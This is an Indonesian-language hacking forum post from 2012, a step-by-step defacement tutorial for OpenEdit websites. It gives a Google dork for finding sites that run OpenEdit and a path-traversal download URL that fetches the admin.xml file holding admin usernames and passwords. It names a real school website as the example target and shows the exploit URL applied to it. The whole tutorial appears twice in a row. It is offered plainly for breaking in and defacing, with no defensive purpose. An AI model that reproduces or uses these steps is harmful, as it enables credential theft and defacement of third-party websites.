09-29-2012, 05:24 PM
#] Dorknya :
inurl:openedit/authentication/
[#] Exploitnya :
/openedit/files/download/WEB-INF/users/admin.xml
langsung saja gak usah banyak basa-basi lagi ..
kita langsung masuk step by step cara defacenya ..
kalo berhasil deface , Ya Selamat , hahhahaha
========
[#] Step 1
========
- Kita Menuju Google Lalu masukan dork diatas , oh iya silakan explore sendiri dorknya biar lebih mantap
========
[#] Step 2
========
- Pilih salah satu target digoogle tadi
Example : http://www.stpetersprestbury.org.uk
========
[#] Step 3
========
- Masukan Exploitnya Tadi
jadinya kek gini ni :
http://www.stpetersprestbury.org.uk/open.../admin.xml
========
[#] Step 4
========
- nah , kamu akan otomatis mengunduh sebuah file XML
setelah diunduh buka File XML yang unduh kamu tadi
========
[#] Step 5
========
- Didalam File XML tu ada Password Dan Username Admin sono .
Ni contohnya aneh dapet dari target atas tadi
:badpc:paswordnya aduhh...:badpc:
inurl:openedit/authentication/
[#] Exploitnya :
/openedit/files/download/WEB-INF/users/admin.xml
langsung saja gak usah banyak basa-basi lagi ..
kita langsung masuk step by step cara defacenya ..
kalo berhasil deface , Ya Selamat , hahhahaha
========
[#] Step 1
========
- Kita Menuju Google Lalu masukan dork diatas , oh iya silakan explore sendiri dorknya biar lebih mantap
========
[#] Step 2
========
- Pilih salah satu target digoogle tadi
Example : http://www.stpetersprestbury.org.uk
========
[#] Step 3
========
- Masukan Exploitnya Tadi
jadinya kek gini ni :
http://www.stpetersprestbury.org.uk/open.../admin.xml
========
[#] Step 4
========
- nah , kamu akan otomatis mengunduh sebuah file XML
setelah diunduh buka File XML yang unduh kamu tadi
========
[#] Step 5
========
- Didalam File XML tu ada Password Dan Username Admin sono .
Ni contohnya aneh dapet dari target atas tadi
:badpc:paswordnya aduhh...:badpc: